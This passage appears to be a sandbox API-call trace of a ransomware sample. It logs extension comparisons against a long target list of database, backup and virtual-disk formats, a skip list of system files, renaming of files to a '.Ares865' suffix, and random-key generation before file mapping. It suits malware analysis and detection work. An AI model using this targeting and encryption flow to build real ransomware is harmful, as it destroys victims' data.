lstrcmpiW (lpString1="7.bmp", lpString2="kexis") returned -1 [0085.019] lstrlenW (lpString="lgc") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.019] lstrlenW (lpString="lwx") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.019] lstrlenW (lpString="maf") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.019] lstrlenW (lpString="maq") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.019] lstrlenW (lpString="mar") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.020] lstrlenW (lpString="marshal") returned 7 [0085.020] lstrcmpiW (lpString1="e27.bmp", lpString2="marshal") returned -1 [0085.020] lstrlenW (lpString="mas") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.020] lstrlenW (lpString="mav") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.020] lstrlenW (lpString="maw") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.020] lstrlenW (lpString="mdbhtml") returned 7 [0085.020] lstrcmpiW (lpString1="e27.bmp", lpString2="mdbhtml") returned -1 [0085.020] lstrlenW (lpString="mdn") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.020] lstrlenW (lpString="mdt") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.020] lstrlenW (lpString="mfd") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.020] lstrlenW (lpString="mpd") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.020] lstrlenW (lpString="mrg") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.020] lstrlenW (lpString="mud") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.020] lstrlenW (lpString="mwb") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.020] lstrlenW (lpString="myd") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.020] lstrlenW (lpString="ndf") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.020] lstrlenW (lpString="nnt") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.020] lstrlenW (lpString="nrmlib") returned 6 [0085.020] lstrcmpiW (lpString1="27.bmp", lpString2="nrmlib") returned -1 [0085.020] lstrlenW (lpString="ns2") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.020] lstrlenW (lpString="ns3") returned 3 [0085.020] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.021] lstrlenW (lpString="ns4") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.021] lstrlenW (lpString="nsf") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.021] lstrlenW (lpString="nv") returned 2 [0085.021] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.021] lstrlenW (lpString="nv2") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.021] lstrlenW (lpString="nwdb") returned 4 [0085.021] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.021] lstrlenW (lpString="nyf") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.021] lstrlenW (lpString="odb") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.021] lstrlenW (lpString="odb") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.021] lstrlenW (lpString="oqy") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.021] lstrlenW (lpString="ora") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.021] lstrlenW (lpString="orx") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.021] lstrlenW (lpString="owc") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.021] lstrlenW (lpString="p96") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.021] lstrlenW (lpString="p97") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.021] lstrlenW (lpString="pan") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.021] lstrlenW (lpString="pdb") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.021] lstrlenW (lpString="pdm") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.021] lstrlenW (lpString="pnz") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.021] lstrlenW (lpString="qry") returned 3 [0085.021] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.022] lstrlenW (lpString="qvd") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.022] lstrlenW (lpString="rbf") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.022] lstrlenW (lpString="rctd") returned 4 [0085.022] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.022] lstrlenW (lpString="rod") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.022] lstrlenW (lpString="rodx") returned 4 [0085.022] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.022] lstrlenW (lpString="rpd") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.022] lstrlenW (lpString="rsd") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.022] lstrlenW (lpString="sas7bdat") returned 8 [0085.022] lstrcmpiW (lpString1="le27.bmp", lpString2="sas7bdat") returned -1 [0085.022] lstrlenW (lpString="sbf") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.022] lstrlenW (lpString="scx") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.022] lstrlenW (lpString="sdb") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.022] lstrlenW (lpString="sdc") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.022] lstrlenW (lpString="sdf") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.022] lstrlenW (lpString="sis") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.022] lstrlenW (lpString="spq") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.022] lstrlenW (lpString="te") returned 2 [0085.022] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.022] lstrlenW (lpString="teacher") returned 7 [0085.022] lstrcmpiW (lpString1="e27.bmp", lpString2="teacher") returned -1 [0085.022] lstrlenW (lpString="tmd") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.022] lstrlenW (lpString="tps") returned 3 [0085.022] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.023] lstrlenW (lpString="trc") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.023] lstrlenW (lpString="trc") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.023] lstrlenW (lpString="trm") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.023] lstrlenW (lpString="udb") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.023] lstrlenW (lpString="udl") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.023] lstrlenW (lpString="usr") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.023] lstrlenW (lpString="v12") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.023] lstrlenW (lpString="vis") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.023] lstrlenW (lpString="vpd") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.023] lstrlenW (lpString="vvv") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.023] lstrlenW (lpString="wdb") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.023] lstrlenW (lpString="wmdb") returned 4 [0085.023] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.023] lstrlenW (lpString="wrk") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.023] lstrlenW (lpString="xdb") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.023] lstrlenW (lpString="xld") returned 3 [0085.023] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.023] lstrlenW (lpString="xmlff") returned 5 [0085.023] lstrcmpiW (lpString1="7.bmp", lpString2="xmlff") returned -1 [0085.023] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp.Ares865") returned 90 [0085.023] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp.ares865"), dwFlags=0x1) returned 1 [0085.024] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.025] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.025] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.026] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.026] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.026] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.029] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.036] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.036] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.036] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.037] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.037] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.037] CloseHandle (hObject=0x15c) returned 1 [0085.037] CloseHandle (hObject=0x118) returned 1 [0085.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.038] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.038] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3177db, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile28.bmp", cAlternateFileName="")) returned 1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2="aoldtz.exe") returned 1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2=".") returned 1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2="..") returned 1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2="windows") returned -1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2="bootmgr") returned 1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2="temp") returned 1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2="pagefile.sys") returned 1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2="boot") returned 1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2="ids.txt") returned 1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2="ntuser.dat") returned 1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2="perflogs") returned 1 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2="MSBuild") returned 1 [0085.038] lstrlenW (lpString="usertile28.bmp") returned 14 [0085.038] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned 82 [0085.038] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile28.bmp" | out: lpString1="usertile28.bmp") returned="usertile28.bmp" [0085.038] lstrlenW (lpString="usertile28.bmp") returned 14 [0085.038] lstrlenW (lpString="Ares865") returned 7 [0085.038] lstrcmpiW (lpString1="e28.bmp", lpString2="Ares865") returned 1 [0085.038] lstrlenW (lpString=".dll") returned 4 [0085.038] lstrcmpiW (lpString1="usertile28.bmp", lpString2=".dll") returned 1 [0085.039] lstrlenW (lpString=".lnk") returned 4 [0085.039] lstrcmpiW (lpString1="usertile28.bmp", lpString2=".lnk") returned 1 [0085.039] lstrlenW (lpString=".ini") returned 4 [0085.039] lstrcmpiW (lpString1="usertile28.bmp", lpString2=".ini") returned 1 [0085.039] lstrlenW (lpString=".sys") returned 4 [0085.039] lstrcmpiW (lpString1="usertile28.bmp", lpString2=".sys") returned 1 [0085.039] lstrlenW (lpString="usertile28.bmp") returned 14 [0085.039] lstrlenW (lpString="bak") returned 3 [0085.039] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.039] lstrlenW (lpString="ba_") returned 3 [0085.039] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.039] lstrlenW (lpString="dbb") returned 3 [0085.039] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.039] lstrlenW (lpString="vmdk") returned 4 [0085.039] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.039] lstrlenW (lpString="rar") returned 3 [0085.039] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.039] lstrlenW (lpString="zip") returned 3 [0085.039] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.039] lstrlenW (lpString="tgz") returned 3 [0085.039] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.039] lstrlenW (lpString="vbox") returned 4 [0085.039] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.039] lstrlenW (lpString="vdi") returned 3 [0085.039] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.039] lstrlenW (lpString="vhd") returned 3 [0085.039] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.039] lstrlenW (lpString="vhdx") returned 4 [0085.039] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.039] lstrlenW (lpString="avhd") returned 4 [0085.039] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.039] lstrlenW (lpString="db") returned 2 [0085.039] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.039] lstrlenW (lpString="db2") returned 3 [0085.039] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.039] lstrlenW (lpString="db3") returned 3 [0085.039] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.039] lstrlenW (lpString="dbf") returned 3 [0085.040] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.040] lstrlenW (lpString="mdf") returned 3 [0085.040] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.040] lstrlenW (lpString="mdb") returned 3 [0085.040] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.040] lstrlenW (lpString="sql") returned 3 [0085.040] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.040] lstrlenW (lpString="sqlite") returned 6 [0085.040] lstrcmpiW (lpString1="28.bmp", lpString2="sqlite") returned -1 [0085.040] lstrlenW (lpString="sqlite3") returned 7 [0085.040] lstrcmpiW (lpString1="e28.bmp", lpString2="sqlite3") returned -1 [0085.040] lstrlenW (lpString="sqlitedb") returned 8 [0085.040] lstrcmpiW (lpString1="le28.bmp", lpString2="sqlitedb") returned -1 [0085.040] lstrlenW (lpString="xml") returned 3 [0085.040] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.040] lstrlenW (lpString="$er") returned 3 [0085.040] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.040] lstrlenW (lpString="4dd") returned 3 [0085.040] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.040] lstrlenW (lpString="4dl") returned 3 [0085.040] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.040] lstrlenW (lpString="^^^") returned 3 [0085.040] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.040] lstrlenW (lpString="abs") returned 3 [0085.040] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.040] lstrlenW (lpString="abx") returned 3 [0085.040] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.040] lstrlenW (lpString="accdb") returned 5 [0085.040] lstrcmpiW (lpString1="8.bmp", lpString2="accdb") returned -1 [0085.040] lstrlenW (lpString="accdc") returned 5 [0085.040] lstrcmpiW (lpString1="8.bmp", lpString2="accdc") returned -1 [0085.040] lstrlenW (lpString="accde") returned 5 [0085.040] lstrcmpiW (lpString1="8.bmp", lpString2="accde") returned -1 [0085.040] lstrlenW (lpString="accdr") returned 5 [0085.040] lstrcmpiW (lpString1="8.bmp", lpString2="accdr") returned -1 [0085.040] lstrlenW (lpString="accdt") returned 5 [0085.040] lstrcmpiW (lpString1="8.bmp", lpString2="accdt") returned -1 [0085.040] lstrlenW (lpString="accdw") returned 5 [0085.041] lstrcmpiW (lpString1="8.bmp", lpString2="accdw") returned -1 [0085.041] lstrlenW (lpString="accft") returned 5 [0085.041] lstrcmpiW (lpString1="8.bmp", lpString2="accft") returned -1 [0085.041] lstrlenW (lpString="adb") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.041] lstrlenW (lpString="adb") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.041] lstrlenW (lpString="ade") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.041] lstrlenW (lpString="adf") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.041] lstrlenW (lpString="adn") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.041] lstrlenW (lpString="adp") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.041] lstrlenW (lpString="alf") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.041] lstrlenW (lpString="ask") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.041] lstrlenW (lpString="btr") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.041] lstrlenW (lpString="cat") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.041] lstrlenW (lpString="cdb") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.041] lstrlenW (lpString="ckp") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.041] lstrlenW (lpString="cma") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.041] lstrlenW (lpString="cpd") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.041] lstrlenW (lpString="dacpac") returned 6 [0085.041] lstrcmpiW (lpString1="28.bmp", lpString2="dacpac") returned -1 [0085.041] lstrlenW (lpString="dad") returned 3 [0085.041] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.041] lstrlenW (lpString="dadiagrams") returned 10 [0085.041] lstrcmpiW (lpString1="tile28.bmp", lpString2="dadiagrams") returned 1 [0085.041] lstrlenW (lpString="daschema") returned 8 [0085.042] lstrcmpiW (lpString1="le28.bmp", lpString2="daschema") returned 1 [0085.042] lstrlenW (lpString="db-journal") returned 10 [0085.042] lstrcmpiW (lpString1="tile28.bmp", lpString2="db-journal") returned 1 [0085.042] lstrlenW (lpString="db-shm") returned 6 [0085.042] lstrcmpiW (lpString1="28.bmp", lpString2="db-shm") returned -1 [0085.042] lstrlenW (lpString="db-wal") returned 6 [0085.042] lstrcmpiW (lpString1="28.bmp", lpString2="db-wal") returned -1 [0085.042] lstrlenW (lpString="dbc") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.042] lstrlenW (lpString="dbs") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.042] lstrlenW (lpString="dbt") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.042] lstrlenW (lpString="dbv") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.042] lstrlenW (lpString="dbx") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.042] lstrlenW (lpString="dcb") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.042] lstrlenW (lpString="dct") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.042] lstrlenW (lpString="dcx") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.042] lstrlenW (lpString="ddl") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.042] lstrlenW (lpString="dlis") returned 4 [0085.042] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.042] lstrlenW (lpString="dp1") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.042] lstrlenW (lpString="dqy") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.042] lstrlenW (lpString="dsk") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.042] lstrlenW (lpString="dsn") returned 3 [0085.042] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.042] lstrlenW (lpString="dtsx") returned 4 [0085.042] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.043] lstrlenW (lpString="dxl") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.043] lstrlenW (lpString="eco") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.043] lstrlenW (lpString="ecx") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.043] lstrlenW (lpString="edb") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.043] lstrlenW (lpString="epim") returned 4 [0085.043] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.043] lstrlenW (lpString="fcd") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.043] lstrlenW (lpString="fdb") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.043] lstrlenW (lpString="fic") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.043] lstrlenW (lpString="flexolibrary") returned 12 [0085.043] lstrcmpiW (lpString1="ertile28.bmp", lpString2="flexolibrary") returned -1 [0085.043] lstrlenW (lpString="fm5") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.043] lstrlenW (lpString="fmp") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.043] lstrlenW (lpString="fmp12") returned 5 [0085.043] lstrcmpiW (lpString1="8.bmp", lpString2="fmp12") returned -1 [0085.043] lstrlenW (lpString="fmpsl") returned 5 [0085.043] lstrcmpiW (lpString1="8.bmp", lpString2="fmpsl") returned -1 [0085.043] lstrlenW (lpString="fol") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.043] lstrlenW (lpString="fp3") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.043] lstrlenW (lpString="fp4") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.043] lstrlenW (lpString="fp5") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.043] lstrlenW (lpString="fp7") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.043] lstrlenW (lpString="fpt") returned 3 [0085.043] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.044] lstrlenW (lpString="frm") returned 3 [0085.044] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.044] lstrlenW (lpString="gdb") returned 3 [0085.044] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.044] lstrlenW (lpString="gdb") returned 3 [0085.044] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.044] lstrlenW (lpString="grdb") returned 4 [0085.044] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.044] lstrlenW (lpString="gwi") returned 3 [0085.044] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.044] lstrlenW (lpString="hdb") returned 3 [0085.044] lstrcmpiW 